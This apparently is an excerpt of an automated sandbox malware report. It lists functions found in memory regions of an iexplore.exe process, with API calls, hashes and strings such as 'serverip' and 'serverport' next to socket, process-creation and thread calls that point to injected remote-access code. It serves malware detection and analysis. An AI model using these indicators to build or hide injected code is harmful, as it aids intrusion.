      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: _memset$_memcpy_s
      • String ID: J
      • API String ID: 288270180-1141589763
      • Opcode ID: eeb157224a60d029665b838213a199b1565ffa1233f7a945ab75ce1be4c66895
      • Instruction ID: 475795891f882efeee60360773db7fc989b8234d893f3f178327e05c35a8551f
      • Opcode Fuzzy Hash: eeb157224a60d029665b838213a199b1565ffa1233f7a945ab75ce1be4c66895
      • Instruction Fuzzy Hash: B4612C75905228AFDF61DF64CC88EEABBB8EB48340F1400E5E5499B261DB31DE85CF50
      Uniqueness

      Uniqueness Score: -1.00%

      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID:
      • String ID: result$serverip$serverport
      • API String ID: 0-1936437466
      • Opcode ID: 912daa96db20b8d670e8809eb503ddfc7bbd46c4a3e7d2e757058ff78b4d4945
      • Instruction ID: 5bb82cd3b569202d580c6e1a0ddbadc683a7a049061762970eb26bd3708148e4
      • Opcode Fuzzy Hash: 912daa96db20b8d670e8809eb503ddfc7bbd46c4a3e7d2e757058ff78b4d4945
      • Instruction Fuzzy Hash: 35416D31A4111AABEB18EB60DC51FEEB778FF59604F0001D5E516A31A0EF747A48DBA1
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetCurrentProcess.KERNEL32(?,?,00000000), ref: 04B51521
      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,00000044,?), ref: 04B515DF
      • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 04B515F6
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: Process$CloseCreateCurrentHandle
      • String ID: D
      • API String ID: 240546133-2746444292
      • Opcode ID: 1731e506f77993d23bcba297bf5abc0242805dd89e77f41c65679ca3fca78dd5
      • Instruction ID: d4618f96e1fc1861c0e0d808be9516874ebdf536baf924bbac6dc56ecf08a9ff
      • Opcode Fuzzy Hash: 1731e506f77993d23bcba297bf5abc0242805dd89e77f41c65679ca3fca78dd5
      • Instruction Fuzzy Hash: 4A31E2F5A012289BDB60DF68CC85BCAB7F8EF48314F4040E5A609E7251D7749A84CF69
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • CreateThread.KERNEL32(00000000,00000000,Function_00011BE8,?,00000000,00000000), ref: 04B5208A
      • Sleep.KERNEL32(00000064,?,?,?), ref: 04B52098
      • CreateThread.KERNEL32(00000000,00000000,Function_00011BFF,?,00000000,00000000), ref: 04B520AE
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: CreateThread$Sleep
      • String ID: result
      • API String ID: 422425972-325763347
      • Opcode ID: 021e78f7ca8f8129c1f3c021c2b4b4dda43a7e4dcb7976d880f3b63894b5aa76
      • Instruction ID: cb7b5782661651b5c84d8f4196d21266a28dd36f5e31b4a67bdcb633a423644b
      • Opcode Fuzzy Hash: 021e78f7ca8f8129c1f3c021c2b4b4dda43a7e4dcb7976d880f3b63894b5aa76
      • Instruction Fuzzy Hash: 34218071901159ABDB24EF76DC54DEFBF78EFD5A04F00009AA91693150EB307902EFA0
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • ___BuildCatchObject.LIBCMT ref: 0301E143
        • Part of subcall function 0301E09E: ___BuildCatchObjectHelper.LIBCMT ref: 0301E0D4
      • _UnwindNestedFrames.LIBCMT ref: 0301E15A
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: BuildCatchObject$FramesHelperNestedUnwind
      • String ID: csm$csm
      • API String ID: 3487967840-3733052814
      • Opcode ID: 681ee65cf728d7d097e2b00e0da8922fa23e0e7b776fbaa098440168254b9aeb
      • Instruction ID: 7dd17530517e816982647ef40dd778ac43baf1d22766558d2b48fc24e3d5a9a2
      • Opcode Fuzzy Hash: 681ee65cf728d7d097e2b00e0da8922fa23e0e7b776fbaa098440168254b9aeb
      • Instruction Fuzzy Hash: FB01D235002209BBDF52AF55CC45EEEBFAAEF49354F048014FD1919160D73299B1DBA0
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetModuleHandleW.KERNEL32(mscoree.dll,?,04B5B5F3,00000000,?,04B59429,000000FF,0000001E,00000001,00000000,00000000,?,04B5C6B5,00000000,00000001,00000000), ref: 04B5B5C5
      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 04B5B5D5
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: AddressHandleModuleProc
      • String ID: CorExitProcess$mscoree.dll
      • API String ID: 1646373207-1276376045
      • Opcode ID: 0cecf91db928f0632cf3a644ade82ebcc6b9013e65aef7af503a8fc9023577a0
      • Instruction ID: 9792e7ac28c8f0efd1fce395d2a78cd304660d106e02a788659099d619a7a5c0
      • Opcode Fuzzy Hash: 0cecf91db928f0632cf3a644ade82ebcc6b9013e65aef7af503a8fc9023577a0
      • Instruction Fuzzy Hash: C2D012302483467B9F1E1EB6AC09B1A7B9CFD80B9471840E6F818D7160EE6AF900C970
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: _memset$_free
      • String ID:
      • API String ID: 2449463427-0
      • Opcode ID: c41c98e6d310a8806774fe1976ef5c0a3d01b3381f98639cff9de84001efa37b
      • Instruction ID: 0a859dd4e7dcceff07905f2a954880341dd37567db4926fc1270eabf6b9c7aa3
      • Opcode Fuzzy Hash: c41c98e6d310a8806774fe1976ef5c0a3d01b3381f98639cff9de84001efa37b
      • Instruction Fuzzy Hash: 7A513175D027289FDB21EBA8CC84DEEB7BCEF85700F1401A5E505E6150EB355A94CF52
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: __calloc_crt__init_pointers__mtterm_free
      • String ID:
      • API String ID: 3556499859-0
      • Opcode ID: 6bd1ec01e2c55118e8059485c3202aa70c6f32d0bad61198a3302cf402aaf824
      • Instruction ID: c200d78d8f8258fc21b562ac98ef7d76f87484d93c3da2daef9c275d9910ac0e
      • Opcode Fuzzy Hash: 6bd1ec01e2c55118e8059485c3202aa70c6f32d0bad61198a3302cf402aaf824
      • Instruction Fuzzy Hash: 50311E35801735AFE722FB75CC8869A7FA9EB49360B14061BEC14DB2B0DB748162CF58
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 04B48610
      • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000), ref: 04B48635
      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 04B48682
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: ByteCharMultiWide
      • String ID: utf-8
      • API String ID: 626452242-1463810698
      • Opcode ID: ae039e3c7f5f64036ecaf3a8583bf7601f5b0c7967994fbd261c3d9f3ebf9aa3
      • Instruction ID: 4d7df95115463d1b15470697530911294a28ccacabbd603a2668f0e67a235811
      • Opcode Fuzzy Hash: ae039e3c7f5f64036ecaf3a8583bf7601f5b0c7967994fbd261c3d9f3ebf9aa3
      • Instruction Fuzzy Hash: C321B6B1A10204BFEB14AFB9DD45EAFBBFDEF80304F0044A9E915D6260EA71ED059B10
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • gethostname.WS2_32(?,00000400), ref: 04B564FA
      • connect.WS2_32(?,?,00000010), ref: 04B56565
      • closesocket.WS2_32(?), ref: 04B56572
        • Part of subcall function 04B561F1: getaddrinfo.WS2_32(?,00000000,?,00000000), ref: 04B56221
      • accept.WS2_32(?,?,?), ref: 04B56595
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: acceptclosesocketconnectgetaddrinfogethostname
      • String ID:
      • API String ID: 571467608-0
      • Opcode ID: 996c7f585db5a5ea4a9ee4ce3ad69894c53705ec2f3ebdd0ece23b454b7cfd5c
      • Instruction ID: 1b148716ca3da82890e208700e44156d2ccd4baee661ce35c09befc8f89a6818
      • Opcode Fuzzy Hash: 996c7f585db5a5ea4a9ee4ce3ad69894c53705ec2f3ebdd0ece23b454b7cfd5c
      • Instruction Fuzzy Hash: 8731A1B1A10608AFDB20DF64DC80BAAB7F8FB15305F4005AEE64AD7590D774B948CB25
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
      • String ID:
      • API String ID: 3016257755-0
      • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
      • Instruction ID: 10fd770fbe10b1f91bce21d8fc2cbf0136291c5abae614cfb1a797ceaed293fa
      • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
      • Instruction Fuzzy Hash: D3114B7640114ABBCF229E84CC11DEE3FA6BB59294B498A15FE1899035C337C5B1AB81
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • __getptd.LIBCMT ref: 03021735
        • Part of subcall function 0301ED38: __getptd_noexit.LIBCMT ref: 0301ED3B
        • Part of subcall function 0301ED38: __amsg_exit.LIBCMT ref: 0301ED48
      • __amsg_exit.LIBCMT ref: 03021755
      • __lock.LIBCMT ref: 03021765
      • _free.LIBCMT ref: 03021795
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
      • String ID:
      • API String ID: 3170801528-0
      • Opcode ID: a0aebf81548fd5ee05eb12b50fc5f1aa2e8b5e36873616e842a07805b486962f
      • Instruction ID: 2cbd252e793a4e361126570c22d76517b7cad0c3fa4ebd52f68a433ec4123b56
      • Opcode Fuzzy Hash: a0aebf81548fd5ee05eb12b50fc5f1aa2e8b5e36873616e842a07805b486962f
      • Instruction Fuzzy Hash: 2D016135D02B31AFD766EB258884BEFBBF4BF85710F084505E8146B280CB345591CBD1
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetLastError.KERNEL32(?,?,04B5C81C,04B58DA9,?,?,04B42E4E,00000000,?,04B4C99A,?,?,?,04B4CE5E,00000000), ref: 04B5EC2F
        • Part of subcall function 04B5EAE9: TlsGetValue.KERNEL32(?,04B5EC42,?,04B42E4E,00000000,?,04B4C99A,?,?,?,04B4CE5E,00000000), ref: 04B5EAF2
        • Part of subcall function 04B5EAE9: RtlDecodePointer.NTDLL ref: 04B5EB04
        • Part of subcall function 04B5EAE9: TlsSetValue.KERNEL32(00000000,?,04B42E4E,00000000,?,04B4C99A,?,?,?,04B4CE5E,00000000), ref: 04B5EB13
      • SetLastError.KERNEL32(00000000,?,04B42E4E,00000000,?,04B4C99A,?,?,?,04B4CE5E,00000000), ref: 04B5EC99
        • Part of subcall function 04B5C6E9: Sleep.KERNEL32(00000000), ref: 04B5C711
      • RtlDecodePointer.NTDLL(00000000), ref: 04B5EC6B
        • Part of subcall function 04B5EB77: GetModuleHandleW.KERNEL32(KERNEL32.DLL,04B76E58,00000008,04B5EC7F,00000000,00000000,?,04B42E4E,00000000,?,04B4C99A,?,?,?,04B4CE5E,00000000), ref: 04B5EB88
        • Part of subcall function 04B5EB77: InterlockedIncrement.KERNEL32(?), ref: 04B5EBC9
      • GetCurrentThreadId.KERNEL32 ref: 04B5EC81
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: DecodeErrorLastPointerValue$CurrentHandleIncrementInterlockedModuleSleepThread
      • String ID:
      • API String ID: 68510339-0
      • Opcode ID: 6f2653163527bf32399a50a3da2fb4044a723f92c335694ba26ab67e910ebba2
      • Instruction ID: c82163245a86b78acbff748f5cb40be8dd9d6e3d4aa42101d591dcdd13cc52b9
      • Opcode Fuzzy Hash: 6f2653163527bf32399a50a3da2fb4044a723f92c335694ba26ab67e910ebba2
      • Instruction Fuzzy Hash: 92F0F4334057216BE7312B797D09B9ABF64DF45772B10028AFC19D71A0CF24ED019AB0
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • std::_Lockit::_Lockit.LIBCPMT ref: 03002062
      • std::exception::exception.LIBCMT ref: 03002092
        • Part of subcall function 03018CCD: std::exception::_Copy_str.LIBCMT ref: 03018CE8
      • __CxxThrowException@8.LIBCMT ref: 030020A7
      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 030020B0
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: std::_$Copy_strException@8Locinfo::_Locinfo_ctorLockitLockit::_Throwstd::exception::_std::exception::exception
      • String ID:
      • API String ID: 118770642-0
      • Opcode ID: d832e093e2715a60e765007ce15b4a54f0df98affa4bea91e2b5ba2c801a8a80
      • Instruction ID: a530a4e07ae314ea840922ca27803efb850b36cac8c39f88127da44a0f6cc4a1
      • Opcode Fuzzy Hash: d832e093e2715a60e765007ce15b4a54f0df98affa4bea91e2b5ba2c801a8a80
      • Instruction Fuzzy Hash: 47018676806748AEC721DF9994C08CBFFF8AE18240784C56EE54987601D774E208CBA5
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: ___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
      • String ID:
      • API String ID: 865245655-0
      • Opcode ID: eff840a7fb55ffa015c0d45cdfdc8c68c57f1e57f225779ed02442c4ca857e2f
      • Instruction ID: d7ff9d7fd7ab8118a0502d3ea147533d0b165d751c3307ac54553091bb53b86d
      • Opcode Fuzzy Hash: eff840a7fb55ffa015c0d45cdfdc8c68c57f1e57f225779ed02442c4ca857e2f
      • Instruction Fuzzy Hash: 94F0F978502754AFD704FF61C98889F7BA9AFC92447148558E94A8F221DB34D463CB90
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • TlsGetValue.KERNEL32(00000000,?,04B5B8AB,00000000,?,000000FF,?,04B65D4D,00000011,00000000,?,04B5EBC1,0000000D), ref: 04B5EE0E
      • TlsGetValue.KERNEL32(?,04B5B8AB,00000000,?,000000FF,?,04B65D4D,00000011,00000000,?,04B5EBC1,0000000D), ref: 04B5EE20
      • RtlDecodePointer.NTDLL(00000000), ref: 04B5EE36
      • TlsSetValue.KERNEL32(00000020,00000000,?,04B5B8AB,00000000,?,000000FF,?,04B65D4D,00000011,00000000,?,04B5EBC1,0000000D), ref: 04B5EE53
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: Value$DecodePointer
      • String ID:
      • API String ID: 721062344-0
      • Opcode ID: 0838f48348c0a1a244ea21ebd3c2d9ca03b513f325a42a95c20ac277f047ea6f
      • Instruction ID: 165e2f54e958981bedddc091dda58b0e08c3f28b6e086786e80960b4ebaf4a94
      • Opcode Fuzzy Hash: 0838f48348c0a1a244ea21ebd3c2d9ca03b513f325a42a95c20ac277f047ea6f
      • Instruction Fuzzy Hash: 8EF0F931400204AAEB615F64FD09B593F65EB093A1F144262AD29975B0CB39AE61ABB4
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
        • Part of subcall function 0301B8E8: _doexit.LIBCMT ref: 0301B8F4
      • ___set_flsgetvalue.LIBCMT ref: 0301BB03
      • ___fls_getvalue@4.LIBCMT ref: 0301BB0E
      • ___fls_setvalue@8.LIBCMT ref: 0301BB20
      • __freefls@4.LIBCMT ref: 0301BB4C
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: ___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
      • String ID:
      • API String ID: 1760487837-0
      • Opcode ID: 4dcf5278da59764a9560cff02305b48f8bd950069605a83fae811cd98af6b26e
      • Instruction ID: 88d2c6203c86a589c647a9c4894cc04a0f164145ff85df4b37b0fb718e967193
      • Opcode Fuzzy Hash: 4dcf5278da59764a9560cff02305b48f8bd950069605a83fae811cd98af6b26e
      • Instruction Fuzzy Hash: 73F01D789023049FCB08FBA1C98489F7BA9AFC8204B208554AD068B625DB35D862DA91
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • TerminateThread.KERNEL32(00000000,00000000,76C86530,?,04B50778,04B4D27A,?,?,?,?,?,?,00000000,00000000,?,?), ref: 04B5073E
      • CloseHandle.KERNEL32(?,76C86530,?,04B50778,04B4D27A,?,?,?,?,?,?,00000000,00000000,?,?,?), ref: 04B50752
      • CloseHandle.KERNEL32(?,76C86530,?,04B50778,04B4D27A,?,?,?,?,?,?,00000000,00000000,?,?,?), ref: 04B5075C
      • CloseHandle.KERNEL32(?,76C86530,?,04B50778,04B4D27A,?,?,?,?,?,?,00000000,00000000,?,?,?), ref: 04B50766
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: CloseHandle$TerminateThread
      • String ID:
      • API String ID: 2297604343-0
      • Opcode ID: ae0c734cdd9aefa0c6790a32a21a93c84a42ccdd060425269ab01b01feccafc9
      • Instruction ID: dc6dab1356d9b57d78325247cb993a164a73991c0de760758dfd74ad7077cbc4
      • Opcode Fuzzy Hash: ae0c734cdd9aefa0c6790a32a21a93c84a42ccdd060425269ab01b01feccafc9
      • Instruction Fuzzy Hash: EAE0E5316047119BDB30BA6AAC84F57A3ECEF44B60B06495AEC55E3650DA64F8428EB0
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: ___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
      • String ID:
      • API String ID: 865245655-0
      • Opcode ID: 99bcf70d96610f6a8388285eaab498e22e81d659d1f8531dd77f612df49d2c25
      • Instruction ID: fbaabf88268f13ce46f54e37ab4aa552cb5b76b74d284ecf289c27b9ab55f238
      • Opcode Fuzzy Hash: 99bcf70d96610f6a8388285eaab498e22e81d659d1f8531dd77f612df49d2c25
      • Instruction Fuzzy Hash: DAF012785033045FD718FF71C9C4C9F7BA9AFC8244B148554AC4A8F626DB35D462D691
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • std::locale::facet::_Incref.LIBCPMT ref: 04B44D6D
      • _Maklocchr.LIBCPMT ref: 04B44DB8
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: IncrefMaklocchrstd::locale::facet::_
      • String ID: e
      • API String ID: 1314436319-4024072794
      • Opcode ID: 37125b1257702162c230a5a3dcb7af2a99271b8127faed15590c9d80afb33861
      • Instruction ID: 31694855757896b2291bb5bf344bc41300cb693fbe950daf54d018f215e294c7
      • Opcode Fuzzy Hash: 37125b1257702162c230a5a3dcb7af2a99271b8127faed15590c9d80afb33861
      • Instruction Fuzzy Hash: 61021571D00219EFEF15DFA4CD44AEEBBB9FF48304F044499E819AB261D731AA25EB50
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: _memset
      • String ID: B$Z
      • API String ID: 2102423945-4127840752
      • Opcode ID: 97a40fea54dec5dfa2c13f704af92e7f045d037c5367db0f7a77d69d530df7f3
      • Instruction ID: a4bc0ccff7cc8ab6b16da3e8545b2634fed4c896fc39093a48ef50dc7dc02ab1
      • Opcode Fuzzy Hash: 97a40fea54dec5dfa2c13f704af92e7f045d037c5367db0f7a77d69d530df7f3
      • Instruction Fuzzy Hash: 00513C7090526DCAFF64EB90CC897E9B7F9AB04704F1884EBC115AA191D6B496C4CFA1
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: _memset
      • String ID: D
      • API String ID: 2102423945-2746444292
      • Opcode ID: 038e0eab4a1be8ad5638e13af7d1f7d7325c464b55b2565f04a9229fac99092b
      • Instruction ID: c5992cf61aad7b1e2363ef001a11fa4801a42da1b9e487be06f4e91cfff6249d
      • Opcode Fuzzy Hash: 038e0eab4a1be8ad5638e13af7d1f7d7325c464b55b2565f04a9229fac99092b
      • Instruction Fuzzy Hash: 9731DBF5A112289FDB60DF64CC84BCAB7F8EF48310F4040A9E609E7241D7749A94CF68
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: _memset
      • String ID: D
      • API String ID: 2102423945-2746444292
      • Opcode ID: cc97cf484279ae63c5931d1969752f1d217f033102ac0d395fd4468e8916f12c
      • Instruction ID: 968f71a4c7c27689c3ba0a26c211278580d70deb6d16f131c09ee206cd730c46
      • Opcode Fuzzy Hash: cc97cf484279ae63c5931d1969752f1d217f033102ac0d395fd4468e8916f12c
      • Instruction Fuzzy Hash: 7C31DBB1A11228ABDB60DF64CC84BCABBF8EF48310F4044A9E709E7241D7749A948F59
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetCurrentProcess.KERNEL32(?,?,00000000), ref: 04B51521
      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,00000044,?), ref: 04B515DF
      • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 04B515F6
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: Process$CloseCreateCurrentHandle
      • String ID: D
      • API String ID: 240546133-2746444292
      • Opcode ID: 28b0a24fb879b3107d47d02f7b6fc7e8aebe2b16269278895dcc8c5cd9aea336
      • Instruction ID: 952a6efc24ef777f926bd5758f334f94a2b688310c5ec3c74ede868dfa85f334
      • Opcode Fuzzy Hash: 28b0a24fb879b3107d47d02f7b6fc7e8aebe2b16269278895dcc8c5cd9aea336
      • Instruction Fuzzy Hash: B931E0F1A01128AADB60DF68CC85BCAB7F8EF48354F4044E5A609E7251D7749A848F69
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • __EH_prolog3_catch.LIBCMT ref: 0300E0CE
      • std::_Xinvalid_argument.LIBCPMT ref: 0300E0E5
        • Part of subcall function 03018011: std::exception::exception.LIBCMT ref: 03018026
        • Part of subcall function 03018011: __CxxThrowException@8.LIBCMT ref: 0301803B
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: Exception@8H_prolog3_catchThrowXinvalid_argumentstd::_std::exception::exception
      • String ID: @
      • API String ID: 1905828624-2766056989
      • Opcode ID: 0c045cba4c9a4f10447bbdc0e24671f9c10bfdef8b169b95c4a3c7aae2ea07b4
      • Instruction ID: a85a6042f9b611f28183eee906932dce7b617cf3a2f4e7c94599ecd573c4d792
      • Opcode Fuzzy Hash: 0c045cba4c9a4f10447bbdc0e24671f9c10bfdef8b169b95c4a3c7aae2ea07b4
      • Instruction Fuzzy Hash: AC11B275A027059FDB24DF68C980A9DB7F0EF54310F24891DE555EB2D0DB30EA80CB54
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: CallFrame@12Setting__getptd
      • String ID: j
      • API String ID: 3454690891-2137352139
      • Opcode ID: fda4dfb616622cb0366f5f8af0e7228d3b77107b78bb831b15d841edec0260b1
      • Instruction ID: 676c1ef71abbe06377cf0842403ca19962e57c9ebec5a173e1b48f2df331f1e0
      • Opcode Fuzzy Hash: fda4dfb616622cb0366f5f8af0e7228d3b77107b78bb831b15d841edec0260b1
      • Instruction Fuzzy Hash: 9E11A979802254EFCB10DF18C5843AEFBB0BF04318F188689D8962F682C37069A5CB81
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • __getptd.LIBCMT ref: 0301DEB8
        • Part of subcall function 0301ED38: __getptd_noexit.LIBCMT ref: 0301ED3B
        • Part of subcall function 0301ED38: __amsg_exit.LIBCMT ref: 0301ED48
      • __getptd.LIBCMT ref: 0301DEC6
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: __getptd$__amsg_exit__getptd_noexit
      • String ID: csm
      • API String ID: 803148776-1018135373
      • Opcode ID: 9940016f2ae665ea65af1b380e1f88aee23af8b8ce1812b5ed7e633863f40bd2
      • Instruction ID: bc8decd934308fc7d46aba36f71c8bd2c4131168151bb1fcd93cd2425a0ce9ac
